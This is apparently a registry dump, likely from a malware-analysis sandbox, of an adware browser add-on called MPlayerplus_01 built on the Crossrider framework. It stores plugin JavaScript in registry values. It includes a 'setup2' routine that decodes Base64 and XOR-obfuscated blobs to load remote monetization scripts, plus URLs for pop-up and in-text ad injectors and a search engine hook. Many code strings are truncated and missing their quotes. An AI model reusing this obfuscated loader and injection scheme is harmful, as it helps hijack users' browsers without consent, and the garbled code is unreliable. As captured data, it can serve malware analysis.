    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el@'"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "Version" = "6"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\MPlayerplus_01\Installer]
    "ErrorsDomain" = "http://errors.clientstaticserv.com"

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi'"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt'"

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDER'"

    [HKCU\Software\Crossrider]
    "Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO1'"

    [HKCU\Software\MPlayerplus_01\Plugins\4]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\MPlayerplus_01\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se4&"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA3&"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/hooks.js"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\MPlayerplus_01]
    "ActiveAppId" = "54246"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-4'"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_2_m.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]&"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "Version" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){A&"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2NjdkNTcxMjAyMWIwYTMwMWIwZjRlNGU1NTU4MWUxYjBlMTU1MzRjNDMwMzAyMGQ1ODFjMGYxNTBjMTEwYTFkMDYxMjU4MGMxNTA4NDYxNDFmNWIwNjFjMjkwMjFiMGMwNzRkMDYwNzA1NDUxMjAzMDkwYTFjMTEwZjExNDgxMjFlMTkwMDA4MDAwODFiNTIwMDA5MTMxZDMzMDE1NDAyMGUxNzUzMzkyMjI2M2U1ODM2M2MyZjI2M2EyOTI1M2QzMzIxMmMzMTMzMjcyMDM4MjkyNjNlM2EzNjQxNDA3ZTdjNTgxZTFiMGUxNTFhMzYxZTE4NTc0MDU2NGQxMjExMWQxMzFmNGU1YTU1MDExODBkNGIxYTE2MWMxMTA3MWMxZjFjMTI0YjBhMGMwMTViMDIwOTU5MWMxYzNhMDQwMjA1MWE1YjEwMDUxZjQ1MDEwNTEwMDMwMTA3MTkxMzUyMTIwZDFmMTkwMTFkMWUwZDUwMWEwOTAwMWIyYTA4NDkxNDE4MTU0OTM5MzEyMDI3NTEyYjJhMzkyNDIwMjkzNjNiMmEyODMxMjcyNTI1M2EzODNhMjAyNzMzMmI1NzU2N2M2NjU4MTUwNTE2MGIxZDFiMzMxMjRkNDA0NTUwNTA0MDdlNTU1YTU2NGY1ODEzMGMxMTE4MWQxNjFiMWE0ZDQwNDUzMjQxMWYxYzFhMGEwNjA2MTQwMjRiM2U2NjA5', 'cltuzvozei'); }"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\MPlayerplus_01\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Update]
    "LastCheck" = "1413862433"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "Name" = "intext_5_m"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ibario_pops_m.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "RunInFrame" = "false"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/pops_5_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,103,104,155,184,190,191,220,195,211,221,233,242,244,253,177,91,28"

    [HKCU\Software\MPlayerplus_01\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functis'"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nM'"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\MPlayerplus_01\Installer]
    "zdata" = "0"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2MDRhNGI0YzUwNGIwYTAxMWEwODNmMTgwNzRlNGE0OTQwMWQxYTBjMWE1MDQ0NDMxOTQ3MDEwNzBhMGEwMDE5NDUwNTFlMGYwZDVhMGQwYTBlMTg0NDA2MTExZjAzMDYwZDBhMDMxYTFmNDIxYTFhNWQxNjA2MTkwNDA0MGUwMDRkMGExMDExMWMyNzM1MzUyODNlM2YzYTMxMjcyNzNjMmYzODM0M2YyNTJiM2QzYzJhMjczNTRjMGExYzAwM2QwYjAxMDIxZDU3MzUzNDJmMjIyNjMxMjYzYzMxMmUyZjM5MzMzMTM5MzIyYTIwMzkyNzJmMzQzMzU2MDEwYjExNTMyNzM1MjkzOTIzMjMzYTMwM2MyYTNkMzgzNTNlM2YzNTNiM2QzYzJhMjczNTQ4NDc2NjUwNDk0MjU1NGMxMDFlMWUxYjFmMjUxYjBlNTc1NDU4NDgwMjFmMTgwMDFhNTg1YTQxMTEzNTA5MTkwODAyMDMxMTJhMDcxNjBjMDU0NTE4MWMxYTAxMTEwMDU2MDkwNTA2NDMxMzFiMDYwNzQxMTIwYjFjMGExZjEzMWIwYjA1MWE1NjAwMTk1NDBmMTgwODBjMWIwYjE0NTcwOTE5MDgwMjM2M2QyYTJkMmEyNTM5MzgzZTM5MmQyNzI3MzEyYjNmMjgzNDI1MzQzNjNkNTMwZjA4MWEzZTAyMTgxYzBjNWYyYTMxM2IzODI1MzgzZjIyMjAyNjMwM2MyNzJiM2EzYjMzM2UyODJmMzAzMTI3NGMwMjAyMDg0ZDM2M2QzNjNjMzczOTM5MzkyNTM0MmMzMDJhM2IyYjJmMzgzNDI1MzQzNjNkNTc0MjcyNGE0YTRiNGM1MjE5MGUwMDA5MTEwNDIzMGY0ZTRhNDk1MzQ1NWM1NDYwNGE0YjRjNTA0YjE0MTAxYzBjMDMwOTBhMDA1MjUzNDIyZTRjMGIwMjA1MWIxYzE5MDc'"

    [HKCU\Software\MPlayerplus_01\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"

    [HKCU\Software\MPlayerplus_01\Plugins\155]
    "Name" = "ibario_pops_m"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3OTYzNDQwMDBkMDQwNDM3MDYwNjUxNTA0NjRhMjYyZjM3MzAyYjM5MjcyYjMyMjEzYTJmM2MyZDI3M2UyYzM1NDkxYjE4MWUxZDE2MGQ0NTExMDMzOTE4MTAwODExMGU1YTAwMDA0ODRhNjI3MDUyMDQwZTAxMGQxYTA0MmYwYzViNGE1NDUwNDE1OTVmNjA2ZjRhMTAxZTE4MGIxYTBmMzkzOTQ0NTI1OTUyMDMwYjFhMGUxYzFkNDgzNzI2MTIxZDNkMDQwMzBiMGYwYTM3MGMwMjE4M2QyYjRhNGU0YTQxMzcyNjMzMjYzZDI3M2UzMjNlMzUzNzMxM2YyNzM2MmIzNTVjMDgwZjQ2MWUxOTEyNWQxNzBiMWUxYTA3MDExZTFlNDkzZDJiMjkyMTI1MzUzYjJiMzkzMDI3MjYzNTMwMmIyYjM4MjYzOTMwM2QyYjRjMTExODA5MWYwYTE1MDY1ZjJiMzUzMDM4MjkzYjJhMjIzZDI2MzEzODJjMjgzNDI3MmUyMzMxMzAyYjM1NTUwODBmMGI0NDJmMmIyMTI2MjUyMDM5MzQyMTNkMzUyNjNkMjEzOTM2MzgzOTIxM2QyZjJiNDQwNjA0MTc1NzQxNDg1MjUwNWMwYzExMWQ1MzJlMDcxYzFjNTg1ZDRiNWEwZDE2MWUzMjAxMTQxNTVjNGI0ZjQ4NzkxNw==', 'jsjfhyptbt'); }"

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac'"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\MPlayerplus_01\Installer]
    "FullVersion" = "1.34.5.12"

    [HKCU\Software\MPlayerplus_01\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
